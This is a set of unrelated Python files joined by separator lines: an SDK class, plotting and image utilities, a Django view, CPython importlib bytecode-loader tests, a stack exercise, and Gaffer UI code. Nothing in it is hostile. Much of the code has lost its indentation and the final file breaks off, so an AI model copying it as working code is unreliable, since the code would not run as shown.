""" imcascade: Fitting astronomical images using a 'cascade' of Gaussians """
__version__ = "1.0"
from .fitter import Fitter
from .results import ImcascadeResults
|
from thepeer_sdk.exceptions import ThepeerSDKException
class Links():
    def __init__(self) -> None:
        if not hasattr(self, "api_client"):
            raise ThepeerSDKException("api_client instance is required")
        if not hasattr(self, "API_BASE_URL"):
            raise ThepeerSDKException("API_BASE_URL is required")
def get_user_links(self, user_ref: str) -> dict:
"""
This returns all linked accounts associated with a user.
        :param user_ref: str
the reference returned when the user was indexed
"""
if not user_ref or user_ref.strip() == "":
raise ThepeerSDKException(
"`user_ref` cannot be an empty string")
return self.api_client.make_get(
url=f'{self.API_BASE_URL}/users/{user_ref}/links',
)
def get_link(self, link_id: str) -> dict:
"""
Get a linked account details
        :param link_id: str
link ID
"""
if not link_id or link_id.strip() == "":
raise ThepeerSDKException(
"`link_id` cannot be an empty string")
return self.api_client.make_get(
url=f'{self.API_BASE_URL}/link/{link_id}',
)
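# Usage sketch (hypothetical names): `Links` expects `api_client` and
# `API_BASE_URL` to be provided by the composing class before __init__ runs,
# e.g. an SDK entry point that mixes it in:
#
#   class Thepeer(Links):
#       def __init__(self, api_client, base_url):
#           self.api_client = api_client
#           self.API_BASE_URL = base_url
#           super().__init__()
#
#   links = Thepeer(client, 'https://api.thepeer.co').get_user_links('some_user_ref')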
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: graph_fruit
# Description: plot each fruit across 10 cities (one line graph per fruit, with one line per city)
# Author: Kuan-Hui Lin
# Date: 2020/5/12
# -------------------------------------------------------------------------------
from collections import defaultdict
from directory import create_directory
import matplotlib.pyplot as plt
def plot_fixed_fruit(path, month, price):
city = ['ATLANTA','BALTIMORE','BOSTON','CHICAGO','COLUMBIA',
'DETROIT','LOS ANGELES','MIAMI','NEW YORK','PHILADELPHIA']
colours=['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple',
'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']
create_directory(path)
# fruit fix
fruit_dic = defaultdict(list)
for j in range(len(price)):
if (j+1)%5 == 1:
fruit_dic['BLUEBERRIES'].append(price[j])
elif (j+1)%5 == 2:
fruit_dic['GUAVA'].append(price[j])
elif (j+1)%5 == 3:
fruit_dic['LIMES'].append(price[j])
elif (j+1)%5 == 4:
fruit_dic['ORANGES'].append(price[j])
elif (j+1)%5 == 0:
fruit_dic['STRAWBERRIES'].append(price[j])
# plot Line Graph
plt.figure(figsize = (11,10))
for key in fruit_dic.keys(): #key is fruit name
leg_list = list()
for f in range(len(fruit_dic[key])):
leg_list.append((str(key),city[f]))
plt.plot(month, fruit_dic[key][f], c=colours[f%10], label='High', alpha=0.5, linewidth = 2.0, linestyle = '-', marker='o')
if (f+1)%10 == 0:
plt.legend(leg_list, loc='best')
plt.title("Fruit Fixed and City Changed")
plt.xlabel("Month")
plt.ylabel("Mean Price for each type")
plt.savefig(path +'/'+ key +'.png')
plt.close()
plt.figure(figsize = (11,10))
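# Example invocation (synthetic data, purely illustrative): `price` is assumed
# to hold 50 monthly series, interleaved as 5 fruits x 10 cities to match the
# modulo-5 bucketing above.
if __name__ == '__main__':
    import random
    months = list(range(1, 13))
    prices = [[random.uniform(1.0, 5.0) for _ in months] for _ in range(50)]
    plot_fixed_fruit('fruit_graphs', months, prices)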
|
# -*- coding: utf-8 -*-
import unittest
import stocks
# make sure all the required libraries can be imported
import pandas.io.data
import pyquery
import email.mime.multipart
import email.mime.text
import numpy
import pystache
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_absolute_truth_and_meaning(self):
assert True
if __name__ == '__main__':
unittest.main()
|
from importlib import machinery
import importlib
import importlib.abc
from .. import abc
from .. import util
from . import util as source_util
import errno
import imp
import marshal
import os
import py_compile
import shutil
import stat
import sys
import unittest
from test.support import make_legacy_pyc
class SimpleTest(unittest.TestCase):
"""Should have no issue importing a source module [basic]. And if there is
a syntax error, it should raise a SyntaxError [syntax error].
"""
def test_load_module_API(self):
        # If fullname is not specified then assume self.name is desired.
class TesterMixin(importlib.abc.Loader):
def load_module(self, fullname): return fullname
def module_repr(self, module): return '<module>'
class Tester(importlib.abc.FileLoader, TesterMixin):
def get_code(self, _): pass
def get_source(self, _): pass
def is_package(self, _): pass
name = 'mod_name'
loader = Tester(name, 'some_path')
self.assertEqual(name, loader.load_module())
self.assertEqual(name, loader.load_module(None))
self.assertEqual(name, loader.load_module(name))
with self.assertRaises(ImportError):
loader.load_module(loader.name + 'XXX')
def test_get_filename_API(self):
# If fullname is not set then assume self.path is desired.
class Tester(importlib.abc.FileLoader):
def get_code(self, _): pass
def get_source(self, _): pass
def is_package(self, _): pass
def module_repr(self, _): pass
path = 'some_path'
name = 'some_name'
loader = Tester(name, path)
self.assertEqual(path, loader.get_filename(name))
self.assertEqual(path, loader.get_filename())
self.assertEqual(path, loader.get_filename(None))
with self.assertRaises(ImportError):
loader.get_filename(name + 'XXX')
# [basic]
def test_module(self):
with source_util.create_modules('_temp') as mapping:
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
module = loader.load_module('_temp')
self.assertIn('_temp', sys.modules)
check = {'__name__': '_temp', '__file__': mapping['_temp'],
'__package__': ''}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def test_package(self):
with source_util.create_modules('_pkg.__init__') as mapping:
loader = machinery.SourceFileLoader('_pkg',
mapping['_pkg.__init__'])
module = loader.load_module('_pkg')
self.assertIn('_pkg', sys.modules)
check = {'__name__': '_pkg', '__file__': mapping['_pkg.__init__'],
'__path__': [os.path.dirname(mapping['_pkg.__init__'])],
'__package__': '_pkg'}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def test_lacking_parent(self):
        with source_util.create_modules('_pkg.__init__', '_pkg.mod') as mapping:
loader = machinery.SourceFileLoader('_pkg.mod',
mapping['_pkg.mod'])
module = loader.load_module('_pkg.mod')
self.assertIn('_pkg.mod', sys.modules)
check = {'__name__': '_pkg.mod', '__file__': mapping['_pkg.mod'],
'__package__': '_pkg'}
for attr, value in check.items():
self.assertEqual(getattr(module, attr), value)
def fake_mtime(self, fxn):
"""Fake mtime to always be higher than expected."""
return lambda name: fxn(name) + 1
def test_module_reuse(self):
with source_util.create_modules('_temp') as mapping:
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
module = loader.load_module('_temp')
module_id = id(module)
module_dict_id = id(module.__dict__)
with open(mapping['_temp'], 'w') as file:
file.write("testing_var = 42\n")
module = loader.load_module('_temp')
self.assertIn('testing_var', module.__dict__,
"'testing_var' not in "
"{0}".format(list(module.__dict__.keys())))
self.assertEqual(module, sys.modules['_temp'])
self.assertEqual(id(module), module_id)
self.assertEqual(id(module.__dict__), module_dict_id)
def test_state_after_failure(self):
# A failed reload should leave the original module intact.
attributes = ('__file__', '__path__', '__package__')
value = '<test>'
name = '_temp'
with source_util.create_modules(name) as mapping:
orig_module = imp.new_module(name)
for attr in attributes:
setattr(orig_module, attr, value)
with open(mapping[name], 'w') as file:
file.write('+++ bad syntax +++')
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
with self.assertRaises(SyntaxError):
loader.load_module(name)
for attr in attributes:
self.assertEqual(getattr(orig_module, attr), value)
# [syntax error]
def test_bad_syntax(self):
with source_util.create_modules('_temp') as mapping:
with open(mapping['_temp'], 'w') as file:
file.write('=')
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
with self.assertRaises(SyntaxError):
loader.load_module('_temp')
self.assertNotIn('_temp', sys.modules)
def test_file_from_empty_string_dir(self):
# Loading a module found from an empty string entry on sys.path should
# not only work, but keep all attributes relative.
file_path = '_temp.py'
with open(file_path, 'w') as file:
file.write("# test file for importlib")
try:
with util.uncache('_temp'):
loader = machinery.SourceFileLoader('_temp', file_path)
mod = loader.load_module('_temp')
self.assertEqual(file_path, mod.__file__)
self.assertEqual(imp.cache_from_source(file_path),
mod.__cached__)
finally:
os.unlink(file_path)
pycache = os.path.dirname(imp.cache_from_source(file_path))
if os.path.exists(pycache):
shutil.rmtree(pycache)
def test_timestamp_overflow(self):
# When a modification timestamp is larger than 2**32, it should be
# truncated rather than raise an OverflowError.
with source_util.create_modules('_temp') as mapping:
source = mapping['_temp']
compiled = imp.cache_from_source(source)
with open(source, 'w') as f:
f.write("x = 5")
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno != getattr(errno, 'EOVERFLOW', None):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
loader = machinery.SourceFileLoader('_temp', mapping['_temp'])
mod = loader.load_module('_temp')
# Sanity checks.
self.assertEqual(mod.__cached__, compiled)
self.assertEqual(mod.x, 5)
# The pyc file was created.
os.stat(compiled)
class BadBytecodeTest(unittest.TestCase):
def import_(self, file, module_name):
loader = self.loader(module_name, file)
module = loader.load_module(module_name)
self.assertIn(module_name, sys.modules)
def manipulate_bytecode(self, name, mapping, manipulator, *,
del_source=False):
"""Manipulate the bytecode of a module by passing it into a callable
that returns what to use as the new bytecode."""
try:
del sys.modules['_temp']
except KeyError:
pass
py_compile.compile(mapping[name])
if not del_source:
bytecode_path = imp.cache_from_source(mapping[name])
else:
os.unlink(mapping[name])
bytecode_path = make_legacy_pyc(mapping[name])
if manipulator:
with open(bytecode_path, 'rb') as file:
bc = file.read()
new_bc = manipulator(bc)
with open(bytecode_path, 'wb') as file:
if new_bc is not None:
file.write(new_bc)
return bytecode_path
def _test_empty_file(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: b'',
del_source=del_source)
test('_temp', mapping, bc_path)
@source_util.writes_bytecode_files
def _test_partial_magic(self, test, *, del_source=False):
        # When there are fewer than 4 bytes in a .pyc, regenerate it if
        # possible, else raise ImportError.
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:3],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_magic_only(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:4],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_partial_timestamp(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:7],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_partial_size(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:11],
del_source=del_source)
test('_temp', mapping, bc_path)
def _test_no_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12],
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bc_path
with self.assertRaises(EOFError):
self.import_(file_path, '_temp')
def _test_non_code_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bytecode_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12] + marshal.dumps(b'abcd'),
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bytecode_path
with self.assertRaises(ImportError) as cm:
self.import_(file_path, '_temp')
self.assertEqual(cm.exception.name, '_temp')
self.assertEqual(cm.exception.path, bytecode_path)
def _test_bad_marshal(self, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bytecode_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: bc[:12] + b'<test>',
del_source=del_source)
file_path = mapping['_temp'] if not del_source else bytecode_path
with self.assertRaises(EOFError):
self.import_(file_path, '_temp')
def _test_bad_magic(self, test, *, del_source=False):
with source_util.create_modules('_temp') as mapping:
bc_path = self.manipulate_bytecode('_temp', mapping,
lambda bc: b'\x00\x00\x00\x00' + bc[4:])
test('_temp', mapping, bc_path)
class SourceLoaderBadBytecodeTest(BadBytecodeTest):
loader = machinery.SourceFileLoader
@source_util.writes_bytecode_files
def test_empty_file(self):
# When a .pyc is empty, regenerate it if possible, else raise
# ImportError.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_empty_file(test)
def test_partial_magic(self):
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_magic(test)
@source_util.writes_bytecode_files
def test_magic_only(self):
# When there is only the magic number, regenerate the .pyc if possible,
# else raise EOFError.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_magic_only(test)
@source_util.writes_bytecode_files
def test_bad_magic(self):
# When the magic number is different, the bytecode should be
# regenerated.
def test(name, mapping, bytecode_path):
self.import_(mapping[name], name)
with open(bytecode_path, 'rb') as bytecode_file:
self.assertEqual(bytecode_file.read(4), imp.get_magic())
self._test_bad_magic(test)
@source_util.writes_bytecode_files
def test_partial_timestamp(self):
# When the timestamp is partial, regenerate the .pyc, else
# raise EOFError.
def test(name, mapping, bc_path):
self.import_(mapping[name], name)
with open(bc_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_timestamp(test)
@source_util.writes_bytecode_files
def test_partial_size(self):
# When the size is partial, regenerate the .pyc, else
# raise EOFError.
def test(name, mapping, bc_path):
self.import_(mapping[name], name)
with open(bc_path, 'rb') as file:
self.assertGreater(len(file.read()), 12)
self._test_partial_size(test)
@source_util.writes_bytecode_files
def test_no_marshal(self):
# When there is only the magic number and timestamp, raise EOFError.
self._test_no_marshal()
@source_util.writes_bytecode_files
def test_non_code_marshal(self):
self._test_non_code_marshal()
# XXX ImportError when sourceless
# [bad marshal]
@source_util.writes_bytecode_files
def test_bad_marshal(self):
# Bad marshal data should raise a ValueError.
self._test_bad_marshal()
# [bad timestamp]
@source_util.writes_bytecode_files
def test_old_timestamp(self):
# When the timestamp is older than the source, bytecode should be
# regenerated.
zeros = b'\x00\x00\x00\x00'
with source_util.create_modules('_temp') as mapping:
py_compile.compile(mapping['_temp'])
bytecode_path = imp.cache_from_source(mapping['_temp'])
with open(bytecode_path, 'r+b') as bytecode_file:
bytecode_file.seek(4)
bytecode_file.write(zeros)
self.import_(mapping['_temp'], '_temp')
source_mtime = os.path.getmtime(mapping['_temp'])
source_timestamp = importlib._w_long(source_mtime)
with open(bytecode_path, 'rb') as bytecode_file:
bytecode_file.seek(4)
self.assertEqual(bytecode_file.read(4), source_timestamp)
# [bytecode read-only]
@source_util.writes_bytecode_files
def test_read_only_bytecode(self):
# When bytecode is read-only but should be rewritten, fail silently.
with source_util.create_modules('_temp') as mapping:
# Create bytecode that will need to be re-created.
py_compile.compile(mapping['_temp'])
bytecode_path = imp.cache_from_source(mapping['_temp'])
with open(bytecode_path, 'r+b') as bytecode_file:
bytecode_file.seek(0)
bytecode_file.write(b'\x00\x00\x00\x00')
# Make the bytecode read-only.
os.chmod(bytecode_path,
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
try:
# Should not raise IOError!
self.import_(mapping['_temp'], '_temp')
finally:
# Make writable for eventual clean-up.
os.chmod(bytecode_path, stat.S_IWUSR)
class SourcelessLoaderBadBytecodeTest(BadBytecodeTest):
loader = machinery.SourcelessFileLoader
def test_empty_file(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_empty_file(test, del_source=True)
def test_partial_magic(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_partial_magic(test, del_source=True)
def test_magic_only(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_magic_only(test, del_source=True)
def test_bad_magic(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(ImportError) as cm:
self.import_(bytecode_path, name)
self.assertEqual(cm.exception.name, name)
self.assertEqual(cm.exception.path, bytecode_path)
self._test_bad_magic(test, del_source=True)
def test_partial_timestamp(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_partial_timestamp(test, del_source=True)
def test_partial_size(self):
def test(name, mapping, bytecode_path):
with self.assertRaises(EOFError):
self.import_(bytecode_path, name)
self._test_partial_size(test, del_source=True)
def test_no_marshal(self):
self._test_no_marshal(del_source=True)
def test_non_code_marshal(self):
self._test_non_code_marshal(del_source=True)
def test_main():
from test.support import run_unittest
run_unittest(SimpleTest,
SourceLoaderBadBytecodeTest,
SourcelessLoaderBadBytecodeTest
)
if __name__ == '__main__':
test_main()
|
#https://www.acmicpc.net/problem/10828
# Stack
import sys
class Stack:
def __init__(self):
self.stack = []
def push(self, num):
self.stack.append(num)
def pop(self):
if not self.empty():
return self.stack.pop()
else:
return -1
def size(self):
return len(self.stack)
def empty(self):
if self.size() == 0:
return 1
else:
return 0
def top(self):
if not self.empty():
return self.stack[-1]
else:
return -1
n = int(sys.stdin.readline().strip())
s = []
for i in range(n):
code = sys.stdin.readline().strip()
if code == 'pop':
if len(s)==0:
print(-1)
else:
print(s.pop())
if code.startswith('push'):
_, num = code.split()
s.append(int(num))
if code == 'top':
if len(s)==0:
print(-1)
else:
print(s[-1])
if code == 'empty':
if len(s)==0:
print(1)
else:
print(0)
if code == 'size':
print(len(s))
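# Note: the Stack class above mirrors the same five commands but is unused; the
# loop works on a plain list directly. An equivalent loop on the class would be
# (sketch): st = Stack(); 'push n' -> st.push(int(n)); 'pop' -> print(st.pop());
# 'top' -> print(st.top()); 'empty' -> print(st.empty()); 'size' -> print(st.size())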
|
import grequests
import logging
from django.shortcuts import render
from django.views.decorators.cache import cache_control
from django.views.decorators.http import require_safe
from core.api.resources import Profile
from core.api.resources import response_list_to_dict
from core.api.resources import Site
from core.api.resources import Trending
from core.api.exceptions import APIException
from core.views import respond_with_error
from core.views import build_pagination_links
logger = logging.getLogger('trending.views')
list_template = 'trending.html'
@require_safe
def list(request):
url, params, headers = Trending.build_request(request.get_host(), access_token=request.access_token)
request.view_requests.append(grequests.get(url, params=params, headers=headers))
try:
responses = response_list_to_dict(grequests.map(request.view_requests))
except APIException as exc:
return respond_with_error(request, exc)
trending = Trending.from_api_response(responses[url])
view_data = {
'user': Profile(responses[request.whoami_url], summary=False) if request.whoami_url else None,
'site': Site(responses[request.site_url]),
'content': trending,
'pagination': build_pagination_links(responses[url]['items']['links'], trending.items),
'site_section': 'trending'
}
return render(request, list_template, view_data)
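# Hypothetical URL wiring for this view (sketch only; the project's real
# urlconf lives elsewhere):
#   from django.conf.urls import url
#   import trending.views
#   urlpatterns = [url(r'^trending/$', trending.views.list, name='trending')]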
|
"""
Some codes from https://github.com/Newmu/dcgan_code
"""
from __future__ import division
import math
import tarfile
import zlib
import io
from PIL import Image
import random
import pprint
import scipy.misc
import numpy as np
from tools.rotation_utils import *
import tensorflow as tf
import tensorflow.contrib.slim as slim
import glob
import os
pp = pprint.PrettyPrinter()
get_stddev = lambda x, k_h, k_w: 1/math.sqrt(k_w*k_h*x.get_shape()[-1])
def show_all_variables():
model_vars = tf.trainable_variables()
slim.model_analyzer.analyze_vars(model_vars, print_info=True)
def get_image(image_path, input_height, input_width,
resize_height=64, resize_width=64,
crop=True):
image = load_webp(image_path)
return transform(image, input_height, input_width,
resize_height, resize_width, crop)
def get_image_jitter(image_path, input_height, input_width,
resize_height=64, resize_width=64, ratio=1.0,
crop=True):
image = load_webp(image_path)
return transform_jitter(image, input_height, input_width,
resize_height, resize_width, ratio, crop)
def get_image_random_crop(image_path, resize_height=64, resize_width=64):
image = load_webp(image_path)
return transform_random_crop(image, resize_height, resize_width)
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def load_webp(img_path):
im = Image.open(img_path)
return np.asarray(im)
def merge(images, size):
h, w = images.shape[1], images.shape[2]
if (images.shape[3] in (3,4)):
c = images.shape[3]
img = np.zeros((h * size[0], w * size[1], c))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w:i * w + w, :] = image
return img
elif images.shape[3]==1:
img = np.zeros((h * size[0], w * size[1]))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j * h:j * h + h, i * w:i * w + w] = image[:,:,0]
return img
else:
raise ValueError('in merge(images,size) images parameter '
'must have dimensions: HxW or HxWx3 or HxWx4')
def crop_square(im):
h = im.shape[0]
w = im.shape[1]
crop_size = min(h, w)
if h > w: #If image is vertical
#Crop using center
mid_point = h // 2
jitter = random.randint(0, (h- crop_size) // 2)
mid_point += jitter #Move away from center crop to give some diversity
try:
cropped = im[(mid_point - crop_size // 2) : (mid_point + crop_size //2), :, :] #Crop using midpoint
# cropped = im[top_left:top_left+crop_size, :, :] #Crop using top left point
        except Exception:
            return None
elif h == w: #If image is square
cropped = im
else: #If image is horizontal
top_left = random.randint(0, w - crop_size)
try:
cropped = im[:, top_left:top_left+crop_size, :]
        except Exception:
            return None
return cropped
def center_crop(x, crop_h, crop_w,
resize_h=64, resize_w=64):
print(x.shape)
h, w = x.shape[:2]
min_dim = np.min([h, w])
if min_dim < crop_h:
print("MIN DIM {0}".format(min_dim))
crop_h = min_dim
print(crop_h)
if h == w:
print("EQUAL")
return scipy.misc.imresize(x, [resize_h, resize_w])
if crop_w is None:
crop_w = crop_h
j = int(round((h - crop_h)/2.))
i = int(round((w - crop_w)/2.))
return scipy.misc.imresize(
x[j:j+crop_h, i:i+crop_w], [resize_h, resize_w])
def center_crop_jitter(x, crop_h, crop_w=None,
resize_h=64, resize_w=64, ratio=1.0):
print("Center crop jitter")
h, w = x.shape[:2]
    min_dim = np.min([h, w])
    if crop_w is None:  # mirror center_crop's default so the slicing below never sees None
        crop_w = crop_h
    if min_dim < crop_h:
        crop_w = min_dim
if h == w:
return scipy.misc.imresize(x, [resize_h, resize_w])
if h < w: #Only consider horizontal images
mid_point = w // 2
diff = w-min_dim
rand = random.randint(0, int(ratio * diff // 2))
if random.random() >= 0.5:
mid_point += rand
else:
mid_point -= rand
return scipy.misc.imresize(
x[:, mid_point-crop_w//2:mid_point+crop_w//2], [resize_h, resize_w])
if h > w:
# Crop using center
crop_size = min(h, w)
mid_point = h // 2
cropped = x[(mid_point - crop_size // 2): (mid_point + crop_size // 2), :, :] # Crop using midpoint
return scipy.misc.imresize(cropped, [resize_h, resize_w])
def random_crop(x,
resize_h=64, resize_w=64):
cropped = crop_square(x)
return scipy.misc.imresize(
cropped, [resize_h, resize_w])
def transform(image, input_height, input_width,
resize_height=64, resize_width=64, crop=True):
if crop:
cropped_image = center_crop(
image, input_height, input_width,
resize_height, resize_width)
else:
cropped_image = scipy.misc.imresize(image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def transform_jitter(image, input_height, input_width,
resize_height=64, resize_width=64, ratio=1.0, crop=True):
if crop:
cropped_image = center_crop_jitter(
image, input_height, input_width,
resize_height, resize_width, ratio)
else:
cropped_image = scipy.misc.imresize(image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def transform_random_crop(image, resize_height=64, resize_width=64):
cropped_image = crop_square(image)
cropped_image = scipy.misc.imresize(cropped_image, [resize_height, resize_width])
if len(cropped_image.shape) != 3: #In case of binary mask with no channels:
cropped_image = np.expand_dims(cropped_image, -1)
return np.array(cropped_image)[:, :, :3]/127.5 - 1.
def inverse_transform(images):
return (images+1.)/2.
def image_manifold_size(num_images):
manifold_h = int(np.floor(np.sqrt(num_images)))
manifold_w = int(np.ceil(np.sqrt(num_images)))
assert manifold_h * manifold_w == num_images
return manifold_h, manifold_w
def to_bool(value):
"""
Converts 'something' to boolean. Raises exception for invalid formats
Possible True values: 1, True, "1", "TRue", "yes", "y", "t"
Possible False values: 0, False, None, [], {}, "", "0", "faLse", "no", "n", "f", 0.0, ...
"""
if str(value).lower() == "true": return True
if str(value).lower() == "false": return False
raise Exception('Invalid value for boolean conversion: ' + str(value))
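if __name__ == '__main__':
    # Minimal self-checks with synthetic shapes (illustrative only; the real
    # entry points for this module live elsewhere).
    _batch = np.zeros((16, 8, 8, 3))
    assert merge(_batch, image_manifold_size(16)).shape == (32, 32, 3)
    assert to_bool('TRue') is True and to_bool('faLse') is False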
|
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import IECore
import Gaffer
import GafferUI
import GafferScene
##########################################################################
# Metadata
##########################################################################
GafferUI.Metadata.registerNodeDescription(
GafferScene.Shader,
"""The base type for all nodes which create shaders. Use the ShaderAssignment node to assign them to objects in the scene.""",
"name",
{
"description" :
"""The name of the shader being represented. This should be considered read-only. Use the Shader.loadShader() method to load a shader.""",
"nodeUI:section" : "header",
},
"parameters",
"""Where the parameters for the shader are represented.""",
)
##########################################################################
# PlugValueWidgets
##########################################################################
class __ShaderNamePlugValueWidget( GafferUI.PlugValueWidget ) :
def __init__( self, plug, **kw ) :
row = GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Horizontal, spacing = 4 )
GafferUI.PlugValueWidget.__init__( self, row, plug, **kw )
with row :
self.__label = GafferUI.Label( "" )
GafferUI.Spacer( IECore.V2i( 1 ), expand=True )
self.__button = GafferUI.Button( "Reload" )
self.__buttonClickedConnection = self.__button.clickedSignal().connect( Gaffer.WeakMethod( self.__buttonClicked ) )
self._updateFromPlug()
def hasLabel( self ) :
return True
def _updateFromPlug( self ) :
with self.getContext() :
shaderName = self.getPlug().getValue()
self.__label.setText( "<h3>Shader : " + shaderName + "</h3>" )
## \todo Disable the RenderMan check once we've got all the shader types implementing reloading properly.
self.__button.setEnabled( shaderName and "RenderMan" in self.getPlug().node().typeName() )
def __buttonClicked( self, button ) :
node = self.getPlug().node()
node.shaderLoader().clear()
with Gaffer.UndoContext( node.ancestor( Gaffer.ScriptNode.staticTypeId() ) ) :
node.loadShader( node["name"].getValue(), keepExistingValues = True )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "name", __ShaderNamePlugValueWidget )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "parameters", GafferUI.CompoundPlugValueWidget, collapsed=None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "out", None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "type", None )
GafferUI.PlugValueWidget.registerCreator( GafferScene.Shader.staticTypeId(), "enabled", None )
##########################################################################
# NodeGadgets and Nodules
##########################################################################
def __nodeGadgetCreator( node ) :
return GafferUI.StandardNodeGadget( node, GafferUI.LinearContainer.Orientation.Y )
GafferUI.NodeGadget.registerNodeGadget( GafferScene.Shader.staticTypeId(), __nodeGadgetCreator )
def __parametersNoduleCreator( plug ) :
return GafferUI.CompoundNodule( plug, GafferUI.LinearContainer.Orientation.Y, spacing = 0.2 )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "parameters", __parametersNoduleCreator )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "name", lambda plug : None )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "type", lambda plug : None )
GafferUI.Nodule.registerNodule( GafferScene.Shader.staticTypeId(), "enabled", lambda plug : None )
# We leave it to the derived class UIs to register creators for the parameters.* plugs, because only the derived classes know whether
# or not networkability makes sense in each case.
##########################################################################
# NodeFinderDialogue mode
##########################################################################
def __shaderNameExtractor( node ) :
if isinstance( node, GafferScene.Shader ) :
return node["name"].getValue()
else :
return ""
GafferUI.NodeFinderDialogue.registerMode( "Shader Names", __shaderNameExtractor )
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 CESNET.
#
# CESNET-OpenID-Remote is free software; you can redistribute it and/or
